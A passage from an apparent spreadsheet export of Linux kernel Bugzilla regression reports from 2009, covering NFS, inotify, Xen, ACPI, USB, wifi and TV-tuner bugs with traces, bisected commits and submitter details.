MemFree: 5932588 kB Buffers: 7036 kB Cached: 60248 kB SwapCached: 0 kB Active: 60028 kB Inactive: 47764 kB Active(anon): 40980 kB Inactive(anon): 0 kB Active(file): 19048 kB Inactive(file): 47764 kB Unevictable: 0 kB Mlocked: 0 kB SwapTotal: 5855684 kB SwapFree: 5855684 kB Dirty: 0 kB Writeback: 0 kB AnonPages: 40508 kB Mapped: 18928 kB Slab: 19824 kB SReclaimable: 6780 kB SUnreclaim: 13044 kB PageTables: 3252 kB NFS_Unstable: 0 kB Bounce: 0 kB WritebackTmp: 0 kB CommitLimit: 8904328 kB Committed_AS: 93232 kB VmallocTotal: 34359738367 kB VmallocUsed: 289584 kB VmallocChunk: 34359446583 kB HugePages_Total: 0 HugePages_Free: 0 HugePages_Rsvd: 0 HugePages_Surp: 0 Hugepagesize: 2048 kB DirectMap4k: 9152 kB DirectMap2M: 6248448 kB Hardware is M2NPV-VM with 6 GB Memory. Regards Matthias Kreis PS: The system can be made available for debugging if needed.</t>
  </si>
  <si>
    <t>Kernel blocks during rsync to NFS-mounted directory exported from Sun OS machine</t>
  </si>
  <si>
    <t>2.6.27.29-170.2.79.fc10.x86_64</t>
  </si>
  <si>
    <t>2009-08-25 02:14 UTC</t>
  </si>
  <si>
    <t>Matthew Breeze</t>
  </si>
  <si>
    <t>2010-02-03 20:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 22838 [details] Fedora 10 machine details (/proc/{cpuinfo,modules,ioports,iomem,scsi/scsi},lspci -vvv) We have a Fedora 10 machine and a Sun OS machine. The Sun OS machine exports a ZFS filesystem (pool) to the Fedora 10 machine, which mounts it using a NFS v4 mount (/etc/fstab: melon:/melon1 /melon1 nfs4 rw,rsize=8192,wsize=8192,timeo=14,intr). When a large file (3 GB) is read from the NFS-mounted directory on the Fedora 10 machine (/melon1) this kernel panic frequently occurs. Also, when performing a rsync to this directory this kernel panic also occurs, even being at one point was completely predictable by consistently crashing 3 times in each case after sending around 2 MB. However, the bug is not always so predictable. The Sun OS machine has apparently no ill effects. I don't know if this is a failure in the implementation of NFS 4 in Linux or in Sun OS. Sun OS machine information: SunOS 5.10 Generic_137112-06 i86pc i386 i86pc Fedora 10 machine information: Client: Fedora 10 Linux Client Kernel Version (/proc/version): Linux version 2.6.27.29-170.2.79.fc10.x86_64 (mockbuild@x86-4.fedora.phx.redhat.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Fri Aug 14 20:49:37 EDT 2009</t>
  </si>
  <si>
    <t>Strange network timeouts w/ e100</t>
  </si>
  <si>
    <t>2009-08-25 22:07 UTC</t>
  </si>
  <si>
    <t>2009-08-26 22:22 UTC</t>
  </si>
  <si>
    <t>Subject : Strange network timeouts w/ 2.6.30.5 Submitter : Walt Holman &lt;walt@holmansrus.com&gt; Date : 2009-08-20 0:21 References : http://marc.info/?l=linux-kernel&amp;m=125072831831443&amp;w=4 Handled-By : Krzysztof Halasa &lt;khc@pm.waw.pl&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops in fsnotify</t>
  </si>
  <si>
    <t>2009-08-25 22:13 UTC</t>
  </si>
  <si>
    <t>2009-10-26 19:56 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc6: Oops in fsnotify Submitter : Grant Wilson &lt;grant.wilson@zen.co.uk&gt; Date : 2009-08-20 15:48 References : http://marc.info/?l=linux-kernel&amp;m=125078450923133&amp;w=4 Notify-Also : Eric Paris &lt;eparis@parisplace.org&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>DomU crashes during xenfb initialization</t>
  </si>
  <si>
    <t>2009-08-25 22:19 UTC</t>
  </si>
  <si>
    <t>2009-10-26 19:13 UTC</t>
  </si>
  <si>
    <t>Subject : DomU crashes during xenfb initialization Submitter : Michal Schmidt &lt;mschmidt@redhat.com&gt; Date : 2009-08-21 10:40 References : http://marc.info/?l=linux-kernel&amp;m=125085108431360&amp;w=4 Handled-By : Michal Schmidt &lt;mschmidt@redhat.com&gt; Patch : http://patchwork.kernel.org/patch/43107/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.31-rc7</t>
  </si>
  <si>
    <t>Crash due to buggy flat_phys_pkg_id</t>
  </si>
  <si>
    <t>2009-08-25 22:38 UTC</t>
  </si>
  <si>
    <t>2009-09-06 20:11 UTC</t>
  </si>
  <si>
    <t>Subject : [patch] x86: 2.6.31-rc7 crash due to buggy flat_phys_pkg_id Submitter : Ravikiran G Thirumalai &lt;kiran@scalex86.org&gt; Date : 2009-08-24 18:26 References : http://marc.info/?l=linux-kernel&amp;m=125114085701508&amp;w=4 Handled-By : Yinghai Lu &lt;yinghai@kernel.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=125122796722793&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Failure to boot as xen guest</t>
  </si>
  <si>
    <t>2009-08-25 22:44 UTC</t>
  </si>
  <si>
    <t>2009-09-06 19:58 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected] 2.6.31 regression: fails to boot as xen guest Submitter : Arnd Hannemann &lt;hannemann@nets.rwth-aachen.de&gt; Date : 2009-08-25 15:48 References : http://marc.info/?l=linux-kernel&amp;m=125121534229538&amp;w=4 Handled-By : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Patch : http://patchwork.kernel.org/patch/43799/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit 83b519e8b9572c319c8e0c615ee5dd7272856090 Author: Pekka Enberg &lt;penberg@cs.helsinki.fi&gt; Date: Wed Jun 10 19:40:04 2009 +0300 slab: setup allocators earlier in the boot sequence First-Bad-Commit : 83b519e8b9572c319c8e0c615ee5dd7272856090</t>
  </si>
  <si>
    <t>Userspace hangs during boot due to inotify change</t>
  </si>
  <si>
    <t>2.6.31-rc8</t>
  </si>
  <si>
    <t>2009-08-28 10:25 UTC</t>
  </si>
  <si>
    <t>2009-08-31 12:43 UTC</t>
  </si>
  <si>
    <t>After upgrading to vanilla kernel 2.6.31-rc8, my Ubuntu Karmic userspace cannot complete the boot sequence. It gets to about this point in the sequence: * Starting kernel event manager... [ 17.416876] udev: starting version 146 * Loading hardware drivers... [ 18.635354] i2c-adapter i2c-0: nForce2 SMBus adapter at 0x600 [ 18.635475] i2c-adapter i2c-1: nForce2 SMBus adapter at 0x700 [ 18.981817] sky2 eth0: enabling interface [ 18.983599] ADDRCONF(NETDEV_UP): eth0: link is not ready [ 19.393425] ACPI: PCI Interrupt Link [LACI] enabled at IRQ 22 [ 19.393502] Intel ICH 0000:00:0d.0: PCI INT A -&gt; Link[LACI] -&gt; GSI 22 (level, low) -&gt; IRQ 22 [ 19.393627] Intel ICH 0000:00:0d.0: setting latency timer to 64 [ 19.706038] intel8x0_measure_ac97_clock: measured 50143 usecs (2464 samples) [ 19.706103] intel8x0: clocking to 46887 [ 21.450250] sky2 eth0: Link is up at 1000 Mbps, full duplex, flow control both [ 21.452066] ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready At which point the boot process halts. I am not sure if it is a userspace bug or a kernel bug. Bisected to this commit: commit 0db501bd0610ee0c0aca84d927f90bcccd09e2bd Author: Eric W. Biederman &lt;ebiederm@xmission.com&gt; Date: Thu Aug 27 03:20:04 2009 -0700 inotify: Ensure we alwasy write the terminating NULL. Before the rewrite copy_event_to_user always wrote a terqminating '\0' byte to user space after the filename. Since the rewrite that terminating byte was skipped if your filename is exactly a multiple of event_size. Ouch! So add one byte to name_size before we round up and use clear_user to set userspace to zero like /dev/zero does instead of copying the strange nul_inotify_event. I can't quite convince myself len_to_zero will never exceed 16 and even if it doesn't clear_user should be more efficient and a more accurate reflection of what the code is trying to do. Signed-off-by: Eric W. Biederman &lt;ebiederm@aristanetworks.com&gt; Signed-off-by: Eric Paris &lt;eparis@redhat.com&gt;</t>
  </si>
  <si>
    <t>MSI EC special treatment enabled for non-MSI notebooks</t>
  </si>
  <si>
    <t>2009-08-28 16:28 UTC</t>
  </si>
  <si>
    <t>Ryan Underwood</t>
  </si>
  <si>
    <t>2009-10-06 02:22 UTC</t>
  </si>
  <si>
    <t>The following code: if (dmi_name_in_vendors("Micro-Star") || dmi_name_in_vendors("Notebook")) { pr_info(PREFIX "Enabling special treatment for EC from MSI.\n"); EC_FLAGS_MSI = 1; } enables MSI workaround on all notebooks, introducing delays into EC handling. The || should probably be &amp;&amp; instead.</t>
  </si>
  <si>
    <t>acpi_ec_ecdt_probe() causes too early invocation of acpi methods</t>
  </si>
  <si>
    <t>2009-08-29 23:22 UTC</t>
  </si>
  <si>
    <t>Maxim Levitsky</t>
  </si>
  <si>
    <t>2009-10-06 02:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 22905 [details] acpidump of affected system Some rogue bioses contain code that disables certain devices, when it doesn't detect windows using OSI. This happens for example on my notebook (acer aspire 5720G), which would disable infrared receiver found in it. I have written a driver for this receiver, but after I have published it, I found out that on some laptops this issue is much more complicated. First, laptop DSDT table runs OSI in _SB._INI method, and stores the result in global variable. It seems to expect that this is called first. Linux does return true for all versions of windows, so in fact it does store expected windows version in this variable (this time it was vista) Second part of the story is that, _STA method of the receiver that is supposed just to return status, will actually disable if this global variable (OSYS) is set to anything but vista. And last, third part of the story is that if system is missing ECDT table, the acpi_ec_ecdt_probe() will walk the acpi namespace, and thus call _STA on each device it finds till it finds the EC. However this is done before main initialization (this is _SB._INI), thus OSYS isn't yet set, and therefore it will disable the IR device permanantly. For illustration, this is the AML code: Device (MIR) { Name (_HID, EisaId ("ENE0100")) Method (_STA, 0, NotSerialized) { If (LAnd (MCIR, LEqual (OSYS, 0x07D6))) { Return (0x0F) } Else { Store (Zero, ^^LPCB.IOR2) Return (Zero) } } ..... Scope (_SB) { Method (_INI, 0, NotSerialized) { If (DTSE) { TRAP (0x47) } Store (0x07D0, OSYS) If (CondRefOf (_OSI, Local0)) { If (_OSI ("Linux")) { Store (One, LINX) Store (Zero, ECDY) } If (_OSI ("Windows 2001")) { Store (0x07D1, OSYS) } If (_OSI ("Windows 2001 SP1")) { Store (0x07D1, OSYS) } If (_OSI ("Windows 2001 SP2")) { Store (0x07D2, OSYS) } If (_OSI ("Windows 2006")) { Store (0x07D6, OSYS) } If (LEqual (TPMV, One)) { If (LLessEqual (OSYS, 0x07D2)) { TRAP (0x49) } } } If (LAnd (MPEN, LEqual (OSYS, 0x07D1))) { TRAP (0x3D) } TRAP (0x2B) } } However, it was attempted to run the acpi_initialize_objects(ACPI_FULL_INITIALIZATION); before acpi_ec_ecdt_probe() but it resulted in system hang. So we get here a circular depedency: We need the EC to run _SB._INI, but to find the EC we need to run _STA on some devices, which should be done after _SB._INI I don't know proper solution to this mess, but here are my suggestions: 1) create a quiet version of acpi_get_devices, which would not run any functions, but just scan till it finds the EC. 2) don't run _STA on blacklisted devices, but assume that are present. This doesn't seem like a good idea, as this function checks for a bios flag. Probably there are notebboks where the reciever _is_ disabled. 3) Create very system specific quirk.</t>
  </si>
  <si>
    <t>WARNING: at fs/notify/inotify/inotify_user.c:394</t>
  </si>
  <si>
    <t>2009-08-30 15:21 UTC</t>
  </si>
  <si>
    <t>2010-04-08 14:51 UTC</t>
  </si>
  <si>
    <t>Hi Eric, here is the bug report. ------------[ cut here ]------------ WARNING: at fs/notify/inotify/inotify_user.c:394 inotify_remove_from_idr+0x47/0x8d() Hardware name: 2373G1G Modules linked in: pata_pcmcia snd_intel8x0m omfs jfs xfs reiserfs hfs hfsplus isofs udf crc_itu_t sch_tbf nls_iso8859_1 nls_cp850 vfat fat usb_storage usb_libusual nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs radeon drm bridge stp llc bnep sco rfcomm l2cap bluetooth ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state ipt_REJECT ipt_LOG xt_limit xt_tcpudp xt_mac xt_multiport iptable_filter iptable_mangle ip_tables x_tables vboxdrv nf_conntrack_ftp nf_conntrack binfmt_misc af_packet cpufreq_powersave nsc_ircc cpufreq_stats cpufreq_userspace autofs4 fuse nls_utf8 ntfs ext2 deadline_iosched as_iosched ircomm_tty ircomm tun acpi_cpufreq joydev snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device irtty_sir yenta_socket ipw2200 rsrc_nonstatic sir_dev thinkpad_acpi snd pcmcia rfkill dvb_usb_cinergyT2 dvb_usb libipw led_class psmouse rtc_cmos irda dvb_core rtc_core lib80211 soundcore ac 8250_pci pcmcia_core nvram 8250_pnp serio_raw i2c_i801 crc_ccitt battery rtc_lib parport_pc snd_page_alloc rng_core 8250 processor parport pcspkr serial_core button evdev ext3 jbd mbcache usbhid hid sg sd_mod sr_mod cdrom ata_generic pata_acpi ata_piix uhci_hcd libata ehci_hcd e1000 intel_agp usbcore nls_base scsi_mod agpgart video output thermal fan unix cpufreq_conservative cpufreq_ondemand freq_table radeonfb fb_ddc backlight i2c_algo_bit cfbcopyarea i2c_core cfbimgblt cfbfillrect fbcon tileblit font bitblit softcursor fb [last unloaded: snd_intel8x0m] Pid: 7534, comm: digikam Tainted: G W 2.6.31-rc8 #1 Call Trace: [&lt;c01254e1&gt;] warn_slowpath_common+0x60/0x90 [&lt;c012551e&gt;] warn_slowpath_null+0xd/0x10 [&lt;c01b3be9&gt;] inotify_remove_from_idr+0x47/0x8d [&lt;c01b40b8&gt;] inotify_ignored_and_remove_idr+0x74/0x88 [&lt;c01b3674&gt;] inotify_freeing_mark+0x8/0xa [&lt;c01b2382&gt;] fsnotify_destroy_mark_by_entry+0x119/0x138 [&lt;c01b3b6d&gt;] sys_inotify_rm_watch+0x7e/0xa2 [&lt;c01028f4&gt;] sysenter_do_call+0x12/0x26 ---[ end trace 4eaa2a86a8e2da24 ]--- and another trace from today: Aug 30 08:40:49 ibm kernel: ------------[ cut here ]------------ Aug 30 08:40:49 ibm kernel: WARNING: at fs/notify/inotify/inotify_fsnotify.c:129 idr_callback+0x2d/0x51() Aug 30 08:40:49 ibm kernel: Hardware name: 2373G1G Aug 30 08:40:49 ibm kernel: inotify closing but id=0 for entry=f1a20770 in group=f353f280 still in idr. Probably leaking memory Aug 30 08:40:49 ibm kernel: Modules linked in: pata_pcmcia omfs jfs xfs reiserfs hfs hfsplus isofs udf crc_itu_t sch_tbf nls_iso8859_1 nls_cp850 vfat fat usb_storage usb_libusual nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs radeon drm bridge stp llc bnep sco rfcomm l2cap bluetooth ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state ipt_REJECT ipt_LOG xt_limit xt_tcpudp xt_mac xt_multiport iptable_filter iptable_mangle ip_tables x_tables vboxdrv nf_conntrack_ftp nf_conntrack binfmt_misc af_packet cpufreq_powersave nsc_ircc cpufreq_stats cpufreq_userspace autofs4 fuse nls_utf8 ntfs ext2 deadline_iosched as_iosched ircomm_tty ircomm tun acpi_cpufreq joydev snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device irtty_sir yenta_socket ipw2200 rsrc_nonstatic sir_dev thinkpad_acpi snd pcmcia rfkill dvb_usb_cinergyT2 dvb_usb libipw led_class psmouse rtc_cmos irda dvb_core rtc_core lib802 Aug 30 08:40:49 ibm kernel: 1 soundcore ac 8250_pci pcmcia_core nvram 8250_pnp serio_raw i2c_i801 crc_ccitt battery rtc_lib parport_pc snd_page_alloc rng_core 8250 processor parport pcspkr serial_core button evdev ext3 jbd mbcache usbhid hid sg sd_mod sr_mod cdrom ata_generic pata_acpi ata_piix uhci_hcd libata ehci_hcd e1000 intel_agp usbcore nls_base scsi_mod agpgart video output thermal fan unix cpufreq_conservative cpufreq_ondemand freq_table radeonfb fb_ddc backlight i2c_algo_bit cfbcopyarea i2c_core cfbimgblt cfbfillrect fbcon tileblit font bitblit softcursor fb [last unloaded: snd_intel8x0m] Aug 30 08:40:49 ibm kernel: Pid: 16142, comm: digikam Tainted: G W 2.6.31-rc8 #1 Aug 30 08:40:49 ibm kernel: Call Trace: Aug 30 08:40:49 ibm kernel: [&lt;c01254e1&gt;] warn_slowpath_common+0x60/0x90 Aug 30 08:40:49 ibm kernel: [&lt;c0125545&gt;] warn_slowpath_fmt+0x24/0x27 Aug 30 08:40:49 ibm kernel: [&lt;c01b36c9&gt;] idr_callback+0x2d/0x51 Aug 30 08:40:49 ibm kernel: [&lt;c01f630d&gt;] idr_for_each+0x5e/0x99 Aug 30 08:40:49 ibm kernel: [&lt;c01b369c&gt;] ? idr_callback+0x0/0x51 Aug 30 08:40:49 ibm kernel: [&lt;c01b1b97&gt;] ? fsnotify_put_event+0x44/0x47 Aug 30 08:40:49 ibm kernel: [&lt;c01b368b&gt;] inotify_free_group_priv+0x15/0x26 Aug 30 08:40:49 ibm kernel: [&lt;c01b1cb9&gt;] fsnotify_final_destroy_group+0x19/0x23 Aug 30 08:40:49 ibm kernel: [&lt;c01b1d74&gt;] fsnotify_put_group+0x71/0x74 Aug 30 08:40:49 ibm kernel: [&lt;c01b384a&gt;] inotify_release+0x19/0x25 Aug 30 08:40:49 ibm kernel: [&lt;c018ec03&gt;] __fput+0xca/0x182 Aug 30 08:40:49 ibm kernel: [&lt;c018ecd3&gt;] fput+0x18/0x1a Aug 30 08:40:49 ibm kernel: [&lt;c018c1fa&gt;] filp_close+0x51/0x5b Aug 30 08:40:49 ibm kernel: [&lt;c01269b8&gt;] put_files_struct+0x67/0xa9 Aug 30 08:40:49 ibm kernel: [&lt;c0126a33&gt;] exit_files+0x39/0x3c Aug 30 08:40:49 ibm kernel: [&lt;c0127fdf&gt;] do_exit+0x19c/0x5ae Aug 30 08:40:49 ibm kernel: [&lt;c012e39b&gt;] ? recalc_sigpending+0xd/0x30 Aug 30 08:40:49 ibm kernel: [&lt;c01309c4&gt;] ? dequeue_signal+0x9d/0x108 Aug 30 08:40:49 ibm kernel: [&lt;c0128453&gt;] do_group_exit+0x62/0x88 Aug 30 08:40:49 ibm kernel: [&lt;c0130f7b&gt;] get_signal_to_deliver+0x368/0x38d Aug 30 08:40:49 ibm kernel: [&lt;c0101dd0&gt;] do_notify_resume+0x75/0x6af Aug 30 08:40:49 ibm kernel: [&lt;c01181df&gt;] ? ___pte_free_tlb+0x35/0x38 Aug 30 08:40:49 ibm kernel: [&lt;c017b05b&gt;] ? free_pgd_range+0x147/0x164 Aug 30 08:40:49 ibm kernel: [&lt;c017b0f6&gt;] ? free_pgtables+0x7e/0x94 Aug 30 08:40:49 ibm kernel: [&lt;c017c53d&gt;] ? unmap_region+0xc8/0x10c Aug 30 08:40:49 ibm kernel: [&lt;c0144463&gt;] ? sys_futex+0xe9/0xff Aug 30 08:40:49 ibm kernel: [&lt;c0102a06&gt;] work_notifysig+0x13/0x19 Aug 30 08:40:49 ibm kernel: ---[ end trace 4eaa2a86a8e2da25 ]--- Additionally, I'm getting this warning while booting the machine. I's a known BIOS bug, not sure, if it may cause the warnings above: ------------[ cut here ]------------ WARNING: at arch/x86/kernel/apic/apic.c:247 native_apic_write_dummy+0x2d/0x39() Hardware name: 2373G1G Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.31-rc8 #1 Call Trace: [&lt;c01254e1&gt;] warn_slowpath_common+0x60/0x90 [&lt;c012551e&gt;] warn_slowpath_null+0xd/0x10 [&lt;c0110ac9&gt;] native_apic_write_dummy+0x2d/0x39 [&lt;c010ccfa&gt;] intel_init_thermal+0xb6/0x144 [&lt;c010c53b&gt;] ? mce_init+0x33/0xb0 [&lt;c010cb73&gt;] mce_intel_feature_init+0xb/0x4c [&lt;c040c9ec&gt;] mcheck_init+0x205/0x28e [&lt;c040b59f&gt;] identify_cpu+0x30b/0x31b [&lt;c0152421&gt;] ? delayacct_init+0x42/0x49 [&lt;c03ec727&gt;] identify_boot_cpu+0xd/0x23 [&lt;c03ec773&gt;] check_bugs+0xb/0xd4 [&lt;c0152421&gt;] ? delayacct_init+0x42/0x49 [&lt;c03e66b3&gt;] start_kernel+0x27b/0x28a [&lt;c03e6065&gt;] __init_begin+0x65/0x6a ---[ end trace 4eaa2a86a8e2da22 ]---</t>
  </si>
  <si>
    <t>cdc_acm gives I/O error</t>
  </si>
  <si>
    <t>2009-09-01 13:30 UTC</t>
  </si>
  <si>
    <t>2010-08-06 18:31 UTC</t>
  </si>
  <si>
    <t>usb 3-2: new full speed USB device using uhci_hcd and address 39 usb 3-2: New USB device found, idVendor=20df, idProduct=0001 usb 3-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 usb 3-2: Product: Entropy Key usb 3-2: Manufacturer: Simtec Electronics usb 3-2: SerialNumber: OQBuBlg0MTFBVxZD usb 3-2: configuration #1 chosen from 1 choice cdc_acm 3-2:1.0: This device cannot do calls on its own. It is not a modem. cdc_acm 3-2:1.0: ttyACM0: USB ACM device # cat /dev/ttyACM0 cat: /dev/ttyACM0: Input/output error This device works in 2.6.30, but is broken in 2.6.31-rc1 and following.</t>
  </si>
  <si>
    <t>Wifi does not work (AR242x)</t>
  </si>
  <si>
    <t>2.6.31-rc5-686</t>
  </si>
  <si>
    <t>2009-09-02 01:19 UTC</t>
  </si>
  <si>
    <t>debacle</t>
  </si>
  <si>
    <t>2013-11-13 16:30 UTC</t>
  </si>
  <si>
    <t>I have the following Wireless, according to lspci -vv: 06:00.0 Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network Adapter (rev 04) (Longer output attached.) It does not work, i.e. I can see APs, but I can't connect. I get the infamous "ath5k phy0: noise floor calibration timeout (2412MHz)", which should be fixed in 2.6.28.1, according to http://wiki.debian.org/ath5k#KnownIssues, but it's still there. I have no idea whether this message is related to my problem. I also saw once or twice a "privacy configuration mismatch and mixed-cell disabled" message. I filed the bug already in Debian: http://bugs.debian.org/520622</t>
  </si>
  <si>
    <t>Tuning a saa7134 based card is broken in kernel 2.6.31-rc7</t>
  </si>
  <si>
    <t>2009-09-03 21:06 UTC</t>
  </si>
  <si>
    <t>Tsvety Petrov</t>
  </si>
  <si>
    <t>2010-12-17 22:06 UTC</t>
  </si>
  <si>
    <t>I have "PixelView PlayTV Pro 3" TV/radio tuner card, and it worked fine with the 2.6.31-6 kernel and the previous versions. The kernel module is loaded with the following options: options saa7134 card=42 tuner=38 given in /etc/modprobe.d/options.conf file. After the system upgrade to kernel 2.6.31-7 a week or two ago, the card stopped working. Namely, if for example I start gnome-radio program, there is a noise coming from the card like of not tuned radio, but changing the station/frequency does not seem to work at all. If I restart the system and select the old kernel 2.6.31-6, it works again. Yesterday the system was upgraded to kernel 2.6.31-9, but the problem still exists with it. I found in patch-2.6.31-rc6-git8.log log file that there are changes in the i2c* and saa7134 drivers and I suppose some of this changes caused the problem. FYI, I'm using Ubuntu Karmic (development branch) with all recent upgrades.</t>
  </si>
  <si>
    <t>2.6.31 regression - pci_get_slot oops, udev boot hang - toshiba X200</t>
  </si>
  <si>
    <t>2009-09-06 07:01 UTC</t>
  </si>
  <si>
    <t>2009-10-26 19:22 UTC</t>
  </si>
  <si>
    <t>My laptop is an toshiba X200, with intel core2 duo cpu 7500 centrino and nvidia card 8700M GT. I want test the fedora rawhide (future F12), and with kernel 2.6.31 fedora don't boot (that's work with kernel 2.6.30) When I install a 2.6.31 kernel (the latest is 2.6.31-0.199.rc8.git2.fc12.x86_64) and I when I want booting on this kernel I have a black screen, with freeze of my laptop (keyboard don't work,fan of my laptop is very speed, and I have obliged to do an hard reset.) For test I compile an 2.6.31 kernel and i install it for same result. Also I think it is not a fedora problem, but a kernel bug for my laptop. I have an problem with kernel 2.6.29 and my laptop (see this bug: http://bugzilla.kernel.org/show_bug.cgi?id=12735 ) and you have resolve it with a patch.</t>
  </si>
  <si>
    <t>WARNING: at arch/x86/kernel/smp.c:117 native_smp_send_reschedule</t>
  </si>
  <si>
    <t>2009-09-06 18:56 UTC</t>
  </si>
  <si>
    <t>2009-10-02 17:19 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING: at arch/x86/kernel/smp.c:117 native_smp_send_reschedule+0x51/0x60() Submitter : Jens Axboe &lt;jens.axboe@oracle.com&gt; Date : 2009-08-31 20:43 References : http://marc.info/?l=linux-kernel&amp;m=125175143918050&amp;w=4 Notify-Also : Américo Wang &lt;xiyou.wangcong@gmail.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARN_ON: fs/buffer.c:1152 mark_buffer_dirty</t>
  </si>
  <si>
    <t>2009-09-06 19:01 UTC</t>
  </si>
  <si>
    <t>2009-09-06 19:15 UTC</t>
  </si>
  <si>
    <t>Subject : WARN_ON: fs/buffer.c:1152 mark_buffer_dirty in 2.6.31-rc8-git Submitter : Thomas Gleixner &lt;tglx@linutronix.de&gt; Date : 2009-09-02 9:19 References : http://marc.info/?l=linux-kernel&amp;m=125188325126806&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NULL pointer dereference in ima_counts_put</t>
  </si>
  <si>
    <t>2.6.31-rc7-git2</t>
  </si>
  <si>
    <t>2009-09-06 19:12 UTC</t>
  </si>
  <si>
    <t>2009-09-07 23:37 UTC</t>
  </si>
  <si>
    <t>Subject : NULL pointer dereference Submitter : Ciprian Docan &lt;docan@eden.rutgers.edu&gt; Date : 2009-09-02 13:49 References : http://marc.info/?l=linux-kernel&amp;m=125190146028116&amp;w=4 Notify-Also : Eric Paris &lt;eparis@redhat.com&gt; Notify-Also : Frans Pop &lt;elendil@planet.nl&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. First-Bad-Commit : 94e5d714f604d4cb4cb13163f01ede278e69258b</t>
  </si>
  <si>
    <t>readcd Oops</t>
  </si>
  <si>
    <t>2009-09-06 19:19 UTC</t>
  </si>
  <si>
    <t>2009-10-01 22:46 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.31-rc8 readcd Oops Submitter : Bob Tracy &lt;rct@gherkin.frus.com&gt; Date : 2009-09-03 3:39 References : http://marc.info/?l=linux-kernel&amp;m=125195043617418&amp;w=4 Handled-By : Michal Schmidt &lt;mschmidt@redhat.com&gt; Patch : http://patchwork.kernel.org/patch/45347/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression in suspend to ram</t>
  </si>
  <si>
    <t>2009-09-06 19:35 UTC</t>
  </si>
  <si>
    <t>2009-10-01 22:43 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in suspend to ram in 2.6.31-rc kernels Submitter : Zdenek Kabelac &lt;zdenek.kabelac@gmail.com&gt; Date : 2009-08-31 11:51 References : http://marc.info/?l=linux-kernel&amp;m=125171952817851&amp;w=4 Handled-By : OGAWA Hirofumi &lt;hirofumi@mail.parknet.co.jp&gt; Patch : http://patchwork.kernel.org/patch/45945/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Output to external monitor is broken</t>
  </si>
  <si>
    <t>2009-09-06 19:42 UTC</t>
  </si>
  <si>
    <t>2009-09-11 14:47 UTC</t>
  </si>
  <si>
    <t>Subject : [Bisected] Output to external monitor is broken (Re: Linux 2.6.31-rc9) Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2009-09-06 14:22 References : http://marc.info/?l=linux-kernel&amp;m=125224701520738&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit f8aed700c6ec46ddade6570004ce25332283b306 Author: Ma Ling &lt;ling.ma@intel.com&gt; Date: Mon Aug 24 13:50:24 2009 +0800 drm/i915: Set crtc/clone mask in different output devices Signed-off-by: Ma Ling &lt;ling.ma@intel.com&gt; Reviewed-by : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Signed-off-by: Zhao Yakui &lt;yakui.zhao@intel.com&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : f8aed700c6ec46ddade6570004ce25332283b306</t>
  </si>
  <si>
    <t>2.6.31-rc9 breaks gianfar</t>
  </si>
  <si>
    <t>2009-09-06 19:46 UTC</t>
  </si>
  <si>
    <t>2009-09-07 23:07 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc9 breaks gianfar Submitter : Michael Guntsche &lt;mike@it-loops.com&gt; Date : 2009-09-06 7:27 References : http://marc.info/?l=linux-kernel&amp;m=125222206218784&amp;w=4 Handled-By : David Miller &lt;davem@davemloft.net&gt; Patch : http://patchwork.kernel.org/patch/45965/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. First-Bad-Commit : 38bddf04bcfe661fbdab94888c3b72c32f6873b3</t>
  </si>
  <si>
    <t>order 2 page allocation failures in iwlagn</t>
  </si>
  <si>
    <t>2009-09-06 19:49 UTC</t>
  </si>
  <si>
    <t>2010-12-17 21:51 UTC</t>
  </si>
  <si>
    <t>14440 14475 14655 15766</t>
  </si>
  <si>
